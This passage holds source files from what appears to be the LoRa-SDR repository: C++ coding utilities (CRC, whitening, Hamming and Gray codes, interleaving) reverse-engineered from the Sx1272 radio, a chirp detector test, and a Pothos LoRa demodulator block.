"text": "/***********************************************************************\n * Defines\n **********************************************************************/\n#define HEADER_RDD 4\n#define N_HEADER_SYMBOLS (HEADER_RDD + 4)\n#define N_HEADER_CODEWORDS 5\n\n\n/***********************************************************************\n * Round functions\n **********************************************************************/\nstatic inline unsigned roundUp(unsigned num, unsigned factor)\n{\n return ((num + factor - 1) / factor) * factor;\n}\n\n/***********************************************************************\n * Simple 8-bit checksum routine\n **********************************************************************/\nstatic inline uint8_t checksum8(const uint8_t *p, const size_t len)\n{\n uint8_t acc = 0;\n for (size_t i = 0; i < len; i++)\n {\n acc = (acc >> 1) + ((acc & 0x1) << 7); //rotate\n acc += p[i]; //add\n }\n return acc;\n}\n\nstatic inline uint8_t headerChecksum(const uint8_t *h) {\n\tauto a0 = (h[0] >> 4) & 0x1;\n\tauto a1 = (h[0] >> 5) & 0x1;\n\tauto a2 = (h[0] >> 6) & 0x1;\n\tauto a3 = (h[0] >> 7) & 0x1;\n\n\tauto b0 = (h[0] >> 0) & 0x1;\n\tauto b1 = (h[0] >> 1) & 0x1;\n\tauto b2 = (h[0] >> 2) & 0x1;\n\tauto b3 = (h[0] >> 3) & 0x1;\n\n\tauto c0 = (h[1] >> 0) & 0x1;\n\tauto c1 = (h[1] >> 1) & 0x1;\n\tauto c2 = (h[1] >> 2) & 0x1;\n\tauto c3 = (h[1] >> 3) & 0x1;\n\n\tuint8_t res;\n\tres = (a0 ^ a1 ^ a2 ^ a3) << 4;\n\tres |= (a3 ^ b1 ^ b2 ^ b3 ^ c0) << 3;\n\tres |= (a2 ^ b0 ^ b3 ^ c1 ^ c3) << 2;\n\tres |= (a1 ^ b0 ^ b2 ^ c0 ^ c1 ^ c2) << 1;\n\tres |= a0 ^ b1 ^ c0 ^ c1 ^ c2 ^ c3;\n\t\n\treturn res;\n}\n\nstatic inline uint16_t crc16sx(uint16_t crc, const uint16_t poly) {\n\tfor (int i = 0; i < 8; i++) {\n\t\tif (crc & 0x8000) {\n\t\t\tcrc = (crc << 1) ^ poly;\n\t\t}\n\t\telse {\n\t\t\tcrc <<= 1;\n\t\t}\n\t}\n\treturn crc;\n}\n\nstatic inline uint8_t xsum8(uint8_t t) {\n\tt ^= t >> 4;\n\tt ^= t >> 2;\n\tt ^= t >> 1;\n\treturn (t & 1);\n}\n\n/***********************************************************************\n * CRC reverse engineered from Sx1272 data stream.\n * Modified CCITT crc with masking of the output with an 8bit lfsr\n **********************************************************************/\nstatic inline uint16_t sx1272DataChecksum(const uint8_t *data, int length) {\n\tuint16_t res = 0;\n\tuint8_t v = 0xff;\n\tuint16_t crc = 0;\n\tfor (int i = 0; i < length; i++) {\n\t\tcrc = crc16sx(res, 0x1021);\n\t\tv = xsum8(v & 0xB8) | (v << 1);\n\t\tres = crc ^ data[i];\n\t}\n\tres ^= v; \n\tv = xsum8(v & 0xB8) | (v << 1);\n\tres ^= v << 8;\n\treturn res;\n}\n\n\n/***********************************************************************\n * http://www.semtech.com/images/datasheet/AN1200.18_AG.pdf\n **********************************************************************/\nstatic inline void SX1232RadioComputeWhitening( uint8_t *buffer, uint16_t bufferSize )\n{\n uint8_t WhiteningKeyMSB; // Global variable so the value is kept after starting the\n uint8_t WhiteningKeyLSB; // de-whitening process\n WhiteningKeyMSB = 0x01; // Init value for the LFSR, these values should be initialize only\n WhiteningKeyLSB = 0xFF; // at the start of a whitening or a de-whitening process\n // *buffer is a char pointer indicating the data to be whiten / de-whiten\n // buffersize is the number of char to be whiten / de-whiten\n // >> The whitened / de-whitened data are directly placed into the pointer\n uint8_t i = 0;\n uint16_t j = 0;\n uint8_t WhiteningKeyMSBPrevious = 0; // 9th bit of the 
LFSR\n for( j = 0; j < bufferSize; j++ ) // byte counter\n {\n buffer[j] ^= WhiteningKeyLSB; // XOR between the data and the whitening key\n for( i = 0; i < 8; i++ ) // 8-bit shift between each byte\n {\n WhiteningKeyMSBPrevious = WhiteningKeyMSB;\n WhiteningKeyMSB = ( WhiteningKeyLSB & 0x01 ) ^ ( ( WhiteningKeyLSB >> 5 ) & 0x01 );\n WhiteningKeyLSB= ( ( WhiteningKeyLSB >> 1 ) & 0xFF ) | ( ( WhiteningKeyMSBPrevious << 7 ) & 0x80 );\n }\n }\n}\n\n\n/***********************************************************************\n * Whitening generator reverse engineered from Sx1272 data stream.\n * Each bit of a codeword is combined with the output from a different position in the whitening sequence.\n **********************************************************************/\nstatic inline void Sx1272ComputeWhitening(uint8_t *buffer, uint16_t bufferSize, const int bitOfs, const int RDD) {\n\tstatic const int ofs0[8] = {6,4,2,0,-112,-114,-302,-34 };\t// offset into sequence for each bit\n\tstatic const int ofs1[5] = {6,4,2,0,-360 };\t\t\t\t\t// different offsets used for single parity mode (1 == RDD)\n\tstatic const int whiten_len = 510;\t\t\t\t\t\t\t// length of whitening sequence\n\tstatic const uint64_t whiten_seq[8] = {\t\t\t\t\t\t// whitening sequence\n\t\t0x0102291EA751AAFFL,0xD24B050A8D643A17L,0x5B279B671120B8F4L,0x032B37B9F6FB55A2L,\n\t\t0x994E0F87E95E2D16L,0x7CBCFC7631984C26L,0x281C8E4F0DAEF7F9L,0x1741886EB7733B15L\n\t};\n\tconst int *ofs = (1 == RDD) ? ofs1 : ofs0;\n\tint i, j;\n\tfor (j = 0; j < bufferSize; j++) {\n\t\tuint8_t x = 0;\n\t\tfor (i = 0; i < 4 + RDD; i++) {\n\t\t\tint t = (ofs[i] + j + bitOfs + whiten_len) % whiten_len;\n\t\t\tif (whiten_seq[t >> 6] & ((uint64_t)1 << (t & 0x3F))) {\n\t\t\t\tx |= 1 << i;\n\t\t\t}\n\t\t}\n\t\tbuffer[j] ^= x;\n\t}\t\n}\n\n/***********************************************************************\n * Whitening generator reverse engineered from Sx1272 data stream.\n * Same as above but using the actual interleaved LFSRs.\n **********************************************************************/\nstatic inline void Sx1272ComputeWhiteningLfsr(uint8_t *buffer, uint16_t bufferSize, const int bitOfs, const size_t RDD) {\n static const uint64_t seed1[2] = {0x6572D100E85C2EFF,0xE85C2EFFFFFFFFFF}; // lfsr start values\n static const uint64_t seed2[2] = {0x05121100F8ECFEEF,0xF8ECFEEFEFEFEFEF}; // lfsr start values for single parity mode (1 == RDD)\n const uint8_t m = 0xff >> (4 - RDD);\n uint64_t r[2] = {(1 == RDD)?seed2[0]:seed1[0],(1 == RDD)?seed2[1]:seed1[1]};\n int i,j;\n for (i = 0; i < bitOfs;i++){\n r[i & 1] = (r[i & 1] >> 8) | (((r[i & 1] >> 32) ^ (r[i & 1] >> 24) ^ (r[i & 1] >> 16) ^ r[i & 1]) << 56); // poly: 0x1D\n }\n for (j = 0; j < bufferSize; j++,i++) {\n buffer[j] ^= r[i & 1] & m;\n r[i & 1] = (r[i & 1] >> 8) | (((r[i & 1] >> 32) ^ (r[i & 1] >> 24) ^ (r[i & 1] >> 16) ^ r[i & 1]) << 56);\n }\t\n}\n\n/***********************************************************************\n * https://en.wikipedia.org/wiki/Gray_code\n **********************************************************************/\n\n/*\n * This function converts an unsigned binary\n * number to reflected binary Gray code.\n *\n * The operator >> is shift right. 
The operator ^ is exclusive or.\n */\nstatic inline unsigned short binaryToGray16(unsigned short num)\n{\n return num ^ (num >> 1);\n}\n\n/*\n * A more efficient version, for Gray codes of 16 or fewer bits.\n */\nstatic inline unsigned short grayToBinary16(unsigned short num)\n{\n num = num ^ (num >> 8);\n num = num ^ (num >> 4);\n num = num ^ (num >> 2);\n num = num ^ (num >> 1);\n return num;\n}\n\n/***********************************************************************\n * Encode a 4 bit word into a 8 bits with parity\n * Non standard version used in sx1272.\n * https://en.wikipedia.org/wiki/Hamming_code\n **********************************************************************/\nstatic inline unsigned char encodeHamming84sx(const unsigned char x)\n{\n auto d0 = (x >> 0) & 0x1;\n auto d1 = (x >> 1) & 0x1;\n auto d2 = (x >> 2) & 0x1;\n auto d3 = (x >> 3) & 0x1;\n \n unsigned char b = x & 0xf;\n b |= (d0 ^ d1 ^ d2) << 4;\n b |= (d1 ^ d2 ^ d3) << 5;\n b |= (d0 ^ d1 ^ d3) << 6;\n b |= (d0 ^ d2 ^ d3) << 7;\n return b;\n}\n\n/***********************************************************************\n * Decode 8 bits into a 4 bit word with single bit correction.\n * Non standard version used in sx1272.\n * Set error to true when a parity error was detected\n * Set bad to true when the result could not be corrected\n **********************************************************************/\nstatic inline unsigned char decodeHamming84sx(const unsigned char b, bool &error, bool &bad)\n{\n auto b0 = (b >> 0) & 0x1;\n auto b1 = (b >> 1) & 0x1;\n auto b2 = (b >> 2) & 0x1;\n auto b3 = (b >> 3) & 0x1;\n auto b4 = (b >> 4) & 0x1;\n auto b5 = (b >> 5) & 0x1;\n auto b6 = (b >> 6) & 0x1;\n auto b7 = (b >> 7) & 0x1;\n \n auto p0 = (b0 ^ b1 ^ b2 ^ b4);\n auto p1 = (b1 ^ b2 ^ b3 ^ b5);\n auto p2 = (b0 ^ b1 ^ b3 ^ b6);\n auto p3 = (b0 ^ b2 ^ b3 ^ b7);\n \n auto parity = (p0 << 0) | (p1 << 1) | (p2 << 2) | (p3 << 3);\n if (parity != 0) error = true;\n switch (parity & 0xf)\n {\n case 0xD: return (b ^ 1) & 0xf;\n case 0x7: return (b ^ 2) & 0xf;\n case 0xB: return (b ^ 4) & 0xf;\n case 0xE: return (b ^ 8) & 0xf;\n case 0x0:\n case 0x1:\n case 0x2:\n case 0x4:\n case 0x8: return b & 0xf;\n default: bad = true; return b & 0xf;\n }\n}\n\n/***********************************************************************\n * Encode a 4 bit word into a 7 bits with parity.\n * Non standard version used in sx1272.\n **********************************************************************/\nstatic inline unsigned char encodeHamming74sx(const unsigned char x)\n{\n auto d0 = (x >> 0) & 0x1;\n auto d1 = (x >> 1) & 0x1;\n auto d2 = (x >> 2) & 0x1;\n auto d3 = (x >> 3) & 0x1;\n \n unsigned char b = x & 0xf;\n b |= (d0 ^ d1 ^ d2) << 4;\n b |= (d1 ^ d2 ^ d3) << 5;\n b |= (d0 ^ d1 ^ d3) << 6;\n return b;\n}\n\n/***********************************************************************\n * Decode 7 bits into a 4 bit word with single bit correction.\n * Non standard version used in sx1272.\n * Set error to true when a parity error was detected\n **********************************************************************/\nstatic inline unsigned char decodeHamming74sx(const unsigned char b, bool &error)\n{\n auto b0 = (b >> 0) & 0x1;\n auto b1 = (b >> 1) & 0x1;\n auto b2 = (b >> 2) & 0x1;\n auto b3 = (b >> 3) & 0x1;\n auto b4 = (b >> 4) & 0x1;\n auto b5 = (b >> 5) & 0x1;\n auto b6 = (b >> 6) & 0x1;\n \n auto p0 = (b0 ^ b1 ^ b2 ^ b4);\n auto p1 = (b1 ^ b2 ^ b3 ^ b5);\n auto p2 = (b0 ^ b1 ^ b3 ^ b6);\n \n auto parity = (p0 << 0) | (p1 << 1) | (p2 << 2);\n if 
(parity != 0) error = true;\n switch (parity)\n {\n case 0x5: return (b ^ 1) & 0xf;\n case 0x7: return (b ^ 2) & 0xf;\n case 0x3: return (b ^ 4) & 0xf;\n case 0x6: return (b ^ 8) & 0xf;\n case 0x0:\n case 0x1:\n case 0x2:\n case 0x4: return b & 0xF;\n }\n return b & 0xf;\n}\n\n/***********************************************************************\n * Check parity for 5/4 code.\n * return true if parity is valid.\n **********************************************************************/\nstatic inline unsigned char checkParity54(const unsigned char b, bool &error) {\n\tauto x = b ^ (b >> 2);\n\tx = x ^ (x >> 1) ^ (b >> 4);\n\tif (x & 1) error = true;\n\treturn b & 0xf;\n}\n\nstatic inline unsigned char encodeParity54(const unsigned char b) {\n\tauto x = b ^ (b >> 2);\n\tx = x ^ (x >> 1);\n\treturn (b & 0xf) | ((x << 4) & 0x10);\n}\n\n/***********************************************************************\n* Check parity for 6/4 code.\n* return true if parity is valid.\n**********************************************************************/\nstatic inline unsigned char checkParity64(const unsigned char b, bool &error) {\n\tauto x = b ^ (b >> 1) ^ (b >> 2);\n\tauto y = x ^ b ^ (b >> 3);\n\t\n\tx ^= b >> 4;\n\ty ^= b >> 5;\n\tif ((x | y) & 1) error = true;\n\treturn b & 0xf;\n}\n\nstatic inline unsigned char encodeParity64(const unsigned char b) {\n\tauto x = b ^ (b >> 1) ^ (b >> 2);\n\tauto y = x ^ b ^ (b >> 3);\n\treturn ((x & 1) << 4) | ((y & 1) << 5) | (b & 0xf);\n}\n\n/***********************************************************************\n * Diagonal interleaver + deinterleaver\n **********************************************************************/\nstatic inline void diagonalInterleaveSx(const uint8_t *codewords, const size_t numCodewords, uint16_t *symbols, const size_t PPM, const size_t RDD){\n\tfor (size_t x = 0; x < numCodewords / PPM; x++)\t{\n\t\tconst size_t cwOff = x*PPM;\n\t\tconst size_t symOff = x*(4 + RDD);\n\t\tfor (size_t k = 0; k < 4 + RDD; k++){\n\t\t\tfor (size_t m = 0; m < PPM; m++){\n\t\t\t\tconst size_t i = (m + k + PPM) % PPM;\n\t\t\t\tconst auto bit = (codewords[cwOff + i] >> k) & 0x1;\n\t\t\t\tsymbols[symOff + k] |= (bit << m);\n\t\t\t}\n\t\t}\n\t}\n}\n\nstatic inline void diagonalDeterleaveSx(const uint16_t *symbols, const size_t numSymbols, uint8_t *codewords, const size_t PPM, const size_t RDD)\n{\n\tfor (size_t x = 0; x < numSymbols / (4 + RDD); x++)\n\t{\n\t\tconst size_t cwOff = x*PPM;\n\t\tconst size_t symOff = x*(4 + RDD);\n\t\tfor (size_t k = 0; k < 4 + RDD; k++)\n\t\t{\n\t\t\tfor (size_t m = 0; m < PPM; m++)\n\t\t\t{\n\t\t\t\tconst size_t i = (m + k) % PPM;\n\t\t\t\tconst auto bit = (symbols[symOff + k] >> m) & 0x1;\n\t\t\t\tcodewords[cwOff + i] |= (bit << k);\n\t\t\t}\n\t\t}\n\t}\n}\n\nstatic inline void diagonalDeterleaveSx2(const uint16_t *symbols, const size_t numSymbols, uint8_t *codewords, const size_t PPM, const size_t RDD){\n\tsize_t nb = RDD + 4;\n\tfor (size_t x = 0; x < numSymbols / nb; x++) {\n\t\tconst size_t cwOff = x*PPM;\n\t\tconst size_t symOff = x*nb;\n\t\tfor (size_t m = 0; m < PPM; m++) {\n\t\t\tsize_t i = m;\n\t\t\tauto sym = symbols[symOff + m];\n\t\t\tfor (size_t k = 0; k < PPM; k++, sym >>= 1) {\n\t\t\t\tcodewords[cwOff + i] |= (sym & 1) << m;\n\t\t\t\tif (++i == PPM) i = 0;\n\t\t\t}\n\t\t}\n\t}\n}\n"
},
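The Gray mapping in LoRaCodes.hpp keeps adjacent demodulated bins one bit apart, so an off-by-one symbol detection costs a single bit error. The two conversions, transcribed to Python with a 16-bit round-trip check:

def binary_to_gray16(n):
    return n ^ (n >> 1)

def gray_to_binary16(n):
    for shift in (8, 4, 2, 1):
        n ^= n >> shift
    return n

assert all(gray_to_binary16(binary_to_gray16(v)) == v for v in range(1 << 16))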
{
"alpha_fraction": 0.5569620132446289,
"alphanum_fraction": 0.579300045967102,
"avg_line_length": 37.371429443359375,
"blob_id": "21e757df106a1d9e6fa91101213b5f12b8cabd39",
"content_id": "045e2ab7cc633e1cf3a3e7c611c374de2a6ffbd7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1343,
"license_type": "no_license",
"max_line_length": 86,
"num_lines": 35,
"path": "/TestDetector.cpp",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "// Copyright (c) 2016-2016 Lime Microsystems\n// SPDX-License-Identifier: BSL-1.0\n\n#include <Pothos/Testing.hpp>\n#include \"LoRaDetector.hpp\"\n#include \"ChirpGenerator.hpp\"\n#include <iostream>\n\nPOTHOS_TEST_BLOCK(\"/lora/tests\", test_detector)\n{\n const size_t N = 1 << 10;\n float phaseAccum = 0.0f;\n std::vector<std::complex<float>> downChirp(N);\n genChirp(downChirp.data(), N, 1, N, 0.0f, true, 1.0f, phaseAccum);\n\n for (size_t sym = 0; sym < N; sym++)\n {\n std::cout << \"testing detector on symbol = \" << sym << std::endl;\n std::vector<std::complex<float>> chirp(N);\n phaseAccum = M_PI/4; //some phase offset\n genChirp(chirp.data(), N, 1, N, float(2*M_PI*sym)/N, false, 1.0f, phaseAccum);\n\n LoRaDetector<float> detector(N);\n for (size_t i = 0; i < N; i++) detector.feed(i, downChirp[i]*chirp[i]);\n float power, powerAvg, fIndex;\n const size_t index = detector.detect(power, powerAvg, fIndex);\n std::cout << \" index \" << index << std::endl;\n std::cout << \" power \" << power << std::endl;\n std::cout << \" powerAvg \" << powerAvg << std::endl;\n std::cout << \" snr \" << (power-powerAvg) << std::endl;\n std::cout << \" fIndex \" << fIndex << std::endl;\n POTHOS_TEST_EQUAL(sym, index);\n POTHOS_TEST_TRUE(power > -10.0);\n }\n}\n"
},
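What test_detector exercises, condensed to numpy: generate an up-chirp offset by the symbol, multiply by the conjugate base chirp, and read the symbol off the FFT peak. The chirp generation mirrors modulate() in examples/modulation_explained_plots.py below; the frequency-domain detector in LoRaDetector.hpp is assumed to reduce to this in the noiseless case:

import cmath
import math
import numpy as np

def chirp(N, sym=0):
    phase, accum, off, out = -math.pi, 0.0, (2 * math.pi * sym) / N, []
    for _ in range(N):
        accum += phase + off
        out.append(cmath.rect(1.0, accum))
        phase += (2 * math.pi) / N
    return np.array(out)

def detect(rx, N):
    # de-chirp, then the strongest FFT bin is the transmitted symbol
    return int(np.argmax(np.abs(np.fft.fft(rx * np.conj(chirp(N))))))

assert detect(chirp(1 << 10, 123), 1 << 10) == 123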
{
"alpha_fraction": 0.4974290132522583,
"alphanum_fraction": 0.508458137512207,
"avg_line_length": 32.8863639831543,
"blob_id": "851b42b84064dc93faf011dc1099e9482aa3a0f1",
"content_id": "6245cb29e913e1859428d95a566df68079356691",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 13419,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 396,
"path": "/LoRaDemod.cpp",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
"text": "// Copyright (c) 2016-2016 Lime Microsystems\n// SPDX-License-Identifier: BSL-1.0\n\n#include <Pothos/Framework.hpp>\n#include <iostream>\n#include <complex>\n#include <cstring>\n#include <cmath>\n#include \"LoRaDetector.hpp\"\n\n/***********************************************************************\n * |PothosDoc LoRa Demod\n *\n * Demodulate LoRa packets from a complex sample stream into symbols.\n *\n * <h2>Input format</h2>\n *\n * The input port 0 accepts a complex sample stream of modulated chirps\n * received at the specified bandwidth and carrier frequency.\n *\n * <h2>Output format</h2>\n *\n * The output port 0 produces a packet containing demodulated symbols.\n * The format of the packet payload is a buffer of unsigned shorts.\n * A 16-bit short can fit all size symbols from 7 to 12 bits.\n *\n * <h2>Debug port raw</h2>\n *\n * The raw debug port outputs the LoRa signal annotated with labels\n * for important synchronization points in the input sample stream.\n *\n * <h2>Debug port dec</h2>\n *\n * The dec debug port outputs the LoRa signal downconverted\n * by a locally generated chirp with the same annotation labels as the raw output.\n *\n * |category /LoRa\n * |keywords lora\n *\n * |param sf[Spread factor] The spreading factor controls the symbol spread.\n * Each symbol will occupy 2^SF number of samples given the waveform BW.\n * |default 10\n *\n * |param sync[Sync word] The sync word is a 2-nibble, 2-symbol sync value.\n * The sync word is encoded after the up-chirps and before the down-chirps.\n * The demodulator ignores packets that do not match the sync word.\n * |default 0x12\n *\n * |param thresh[Threshold] The minimum required level in dB for the detector.\n * The threshold level is used to enter and exit the demodulation state machine.\n * |units dB\n * |default -30.0\n *\n * |param mtu[Symbol MTU] Produce MTU at most symbols after sync is found.\n * The demodulator does not inspect the payload and will produce at most\n * the specified MTU number of symbols or less if the detector squelches.\n * |units symbols\n * |default 256\n *\n * |factory /lora/lora_demod(sf)\n * |setter setSync(sync)\n * |setter setThreshold(thresh)\n * |setter setMTU(mtu)\n **********************************************************************/\nclass LoRaDemod : public Pothos::Block\n{\npublic:\n LoRaDemod(const size_t sf):\n N(1 << sf),\n _fineSteps(128),\n _detector(N),\n _sync(0x12),\n _thresh(-30.0),\n _mtu(256)\n {\n this->registerCall(this, POTHOS_FCN_TUPLE(LoRaDemod, setSync));\n this->registerCall(this, POTHOS_FCN_TUPLE(LoRaDemod, setThreshold));\n this->registerCall(this, POTHOS_FCN_TUPLE(LoRaDemod, setMTU));\n this->setupInput(0, typeid(std::complex<float>));\n this->setupOutput(0);\n this->setupOutput(\"raw\", typeid(std::complex<float>));\n this->setupOutput(\"dec\", typeid(std::complex<float>));\n this->setupOutput(\"fft\", typeid(std::complex<float>));\n \n this->registerSignal(\"error\");\n this->registerSignal(\"power\");\n this->registerSignal(\"snr\");\n\n //use at most two input symbols available\n this->input(0)->setReserve(N*2);\n\n //store port pointers to avoid lookup by name\n _rawPort = this->output(\"raw\");\n _decPort = this->output(\"dec\");\n _fftPort = this->output(\"fft\");\n \n //generate chirp table\n float phase = -M_PI;\n double phaseAccum = 0.0;\n for (size_t i = 0; i < N; i++)\n {\n phaseAccum += phase;\n auto entry = std::polar(1.0, phaseAccum);\n _upChirpTable.push_back(std::complex<float>(std::conj(entry)));\n 
_downChirpTable.push_back(std::complex<float>(entry));\n phase += (2*M_PI)/N;\n }\n phaseAccum = 0.0;\n phase = 2.0 * M_PI / (N * _fineSteps);\n for (size_t i = 0; i < N * _fineSteps; i++){\n phaseAccum += phase;\n auto entry = std::polar(1.0, phaseAccum);\n _fineTuneTable.push_back(std::complex<float>(entry));\n }\n \n _fineTuneIndex = 0;\n }\n\n static Block *make(const size_t sf)\n {\n return new LoRaDemod(sf);\n }\n\n void setSync(const unsigned char sync)\n {\n _sync = sync;\n }\n\n void setThreshold(const double thresh_dB)\n {\n _thresh = thresh_dB;\n }\n\n void setMTU(const size_t mtu)\n {\n _mtu = mtu;\n }\n\n void activate(void)\n {\n _state = STATE_FRAMESYNC;\n _chirpTable = _upChirpTable.data();\n }\n\n void work(void)\n {\n auto inPort = this->input(0);\n if (inPort->elements() < N*2) return;\n \n size_t total = 0;\n auto inBuff = inPort->buffer().as<const std::complex<float> *>();\n auto rawBuff = _rawPort->buffer().as<std::complex<float> *>();\n auto decBuff = _decPort->buffer().as<std::complex<float> *>();\n auto fftBuff = _fftPort->buffer().as<std::complex<float> *>();\n\n //process the available symbol\n for (size_t i = 0; i < N; i++){\n auto samp = inBuff[i];\n auto decd = samp*_chirpTable[i] * _fineTuneTable[_fineTuneIndex];\n _fineTuneIndex -= _finefreqError * _fineSteps;\n if (_fineTuneIndex < 0) _fineTuneIndex += N * _fineSteps;\n else if (_fineTuneIndex >= int(N * _fineSteps)) _fineTuneIndex -= N * _fineSteps;\n rawBuff[i] = samp;\n decBuff[i] = decd;\n _detector.feed(i, decd);\n }\n float power = 0;\n float powerAvg = 0;\n float snr = 0;\n float fIndex = 0;\n \n auto value = _detector.detect(power,powerAvg,fIndex,fftBuff);\n snr = power - powerAvg;\n const bool squelched = (snr < _thresh);\n\n switch (_state)\n {\n ////////////////////////////////////////////////////////////////\n case STATE_FRAMESYNC:\n ////////////////////////////////////////////////////////////////\n {\n //format as observed from inspecting RN2483\n bool syncd = not squelched and (_prevValue+4)/8 == 0;\n bool match0 = (value+4)/8 == unsigned(_sync>>4);\n bool match1 = false;\n\n //if the symbol matches sync word0 then check sync word1 as well\n //otherwise assume its the frame sync and adjust for frequency error\n if (syncd and match0)\n {\n int ft = _fineTuneIndex;\n for (size_t i = 0; i < N; i++)\n {\n auto samp = inBuff[i + N];\n auto decd = samp*_chirpTable[i] * _fineTuneTable[ft];\n ft -= _finefreqError * _fineSteps;\n if (ft < 0) ft += N * _fineSteps;\n else if (ft >= int(N * _fineSteps)) ft -= N * _fineSteps;\n rawBuff[i+N] = samp;\n decBuff[i+N] = decd;\n _detector.feed(i, decd);\n }\n auto value1 = _detector.detect(power,powerAvg,fIndex);\n //format as observed from inspecting RN2483\n match1 = (value1+4)/8 == unsigned(_sync & 0xf);\n }\n\n if (syncd and match0 and match1)\n {\n total = 2*N;\n _state = STATE_DOWNCHIRP0;\n _chirpTable = _downChirpTable.data();\n _id = \"SYNC\";\n }\n\n //otherwise its a frequency error\n else if (not squelched)\n {\n total = N - value;\n _finefreqError += fIndex;\n\t\t\t\tstd::stringstream stream;\n\t\t\t\tstream.precision(4);\n\t\t\t\tstream << std::fixed << \"P \" << fIndex;\n\t\t\t\t_id = stream.str();\n // _id = \"P \" + std::to_string(fIndex);\n }\n\n //just noise\n else\n {\n total = N;\n _finefreqError = 0;\n _fineTuneIndex = 0;\n _id = \"\";\n }\n\n } break;\n\n ////////////////////////////////////////////////////////////////\n case STATE_DOWNCHIRP0:\n ////////////////////////////////////////////////////////////////\n {\n _state = 
STATE_DOWNCHIRP1;\n total = N;\n _id = \"DC\";\n int error = value;\n if (value > N/2) error -= N;\n //std::cout << \"error0 \" << error << std::endl;\n _freqError = error;\n } break;\n\n ////////////////////////////////////////////////////////////////\n case STATE_DOWNCHIRP1:\n ////////////////////////////////////////////////////////////////\n {\n _state = STATE_QUARTERCHIRP;\n total = N;\n _chirpTable = _upChirpTable.data();\n _id = \"\";\n _outSymbols = Pothos::BufferChunk(typeid(int16_t), _mtu);\n\n int error = value;\n if (value > N/2) error -= N;\n //std::cout << \"error1 \" << error << std::endl;\n _freqError = (_freqError + error)/2;\n\n this->emitSignal(\"error\", _freqError);\n this->emitSignal(\"power\", power);\n this->emitSignal(\"snr\", snr);\n } break;\n\n ////////////////////////////////////////////////////////////////\n case STATE_QUARTERCHIRP:\n ////////////////////////////////////////////////////////////////\n {\n _state = STATE_DATASYMBOLS;\n \n total = N/4 + (_freqError / 2);\n _finefreqError += (_freqError / 2);\n \n _symCount = 0;\n _id = \"QC\";\n } break;\n\n ////////////////////////////////////////////////////////////////\n case STATE_DATASYMBOLS:\n ////////////////////////////////////////////////////////////////\n {\n total = N;\n _outSymbols.as<int16_t *>()[_symCount++] = int16_t(value);\n if (_symCount >= _mtu or squelched)\n {\n //for (size_t j = 0; j < _symCount; j++)\n // std::cout << \"demod[\" << j << \"]=\" << _outSymbols.as<const uint16_t *>()[j] << std::endl;\n Pothos::Packet pkt;\n pkt.payload = _outSymbols;\n pkt.payload.length = _symCount*sizeof(int16_t);\n this->output(0)->postMessage(pkt);\n _finefreqError = 0;\n _state = STATE_FRAMESYNC;\n }\n\t\t\tstd::stringstream stream;\n\t\t\tstream.precision(4);\n\t\t\tstream << std::fixed << \"S\" << _symCount << \" \" << fIndex;\n\t\t\t_id = stream.str();\n //_id = \"S\" + std::to_string(_symCount) + \" \" + std::to_string(fIndex);\n \n // _finefreqError += fIndex;\n \n } break;\n\n }\n\n if (not _id.empty())\n {\n _rawPort->postLabel(Pothos::Label(_id, Pothos::Object(), 0));\n _decPort->postLabel(Pothos::Label(_id, Pothos::Object(), 0));\n _fftPort->postLabel(Pothos::Label(_id, Pothos::Object(), 0));\n }\n inPort->consume(total);\n _rawPort->produce(total);\n _decPort->produce(total);\n \n _fftPort->produce(N);\n \n _prevValue = value;\n }\n\n //! Custom output buffer manager with slabs large enough for debug output\n Pothos::BufferManager::Sptr getOutputBufferManager(const std::string &name, const std::string &domain)\n {\n if (name == \"raw\" or name == \"dec\")\n {\n this->output(name)->setReserve(N * 2);\n Pothos::BufferManagerArgs args;\n args.bufferSize = N*2*sizeof(std::complex<float>);\n return Pothos::BufferManager::make(\"generic\", args);\n }else if (name == \"fft\"){\n this->output(name)->setReserve(N);\n Pothos::BufferManagerArgs args;\n args.bufferSize = N*sizeof(std::complex<float>);\n return Pothos::BufferManager::make(\"generic\", args);\n }\n return Pothos::Block::getOutputBufferManager(name, domain);\n }\n\n //! 
Custom input buffer manager with slabs large enough for fft input\n Pothos::BufferManager::Sptr getInputBufferManager(const std::string &name, const std::string &domain)\n {\n if (name == \"0\")\n {\n Pothos::BufferManagerArgs args;\n args.bufferSize = std::max(args.bufferSize,\n N*2*sizeof(std::complex<float>));\n return Pothos::BufferManager::make(\"generic\", args);\n }\n return Pothos::Block::getInputBufferManager(name, domain);\n }\n\nprivate:\n //configuration\n const size_t N;\n const size_t _fineSteps;\n LoRaDetector<float> _detector;\n std::complex<float> *_chirpTable;\n std::vector<std::complex<float>> _upChirpTable;\n std::vector<std::complex<float>> _downChirpTable;\n std::vector<std::complex<float>> _fineTuneTable;\n unsigned char _sync;\n float _thresh;\n size_t _mtu;\n Pothos::OutputPort *_rawPort;\n Pothos::OutputPort *_decPort;\n Pothos::OutputPort *_fftPort;\n\n //state\n enum LoraDemodState\n {\n STATE_FRAMESYNC,\n STATE_DOWNCHIRP0,\n STATE_DOWNCHIRP1,\n STATE_QUARTERCHIRP,\n STATE_DATASYMBOLS,\n };\n LoraDemodState _state;\n size_t _symCount;\n Pothos::BufferChunk _outSymbols;\n std::string _id;\n short _prevValue;\n int _freqError;\n int _fineTuneIndex;\n float _finefreqError;\n};\n\nstatic Pothos::BlockRegistry registerLoRaDemod(\n \"/lora/lora_demod\", &LoRaDemod::make);\n"
},
{
"alpha_fraction": 0.5281110405921936,
"alphanum_fraction": 0.5532816052436829,
"avg_line_length": 33.282257080078125,
"blob_id": "09abdc5c12924af47f85dfd5a9c2bbb2c5e97a06",
"content_id": "808bfae2b4f3852a71145b6f351f1afeda95f455",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4251,
"license_type": "no_license",
"max_line_length": 84,
"num_lines": 124,
"path": "/examples/modulation_explained_plots.py",
"repo_name": "myriadrf/LoRa-SDR",
"src_encoding": "UTF-8",
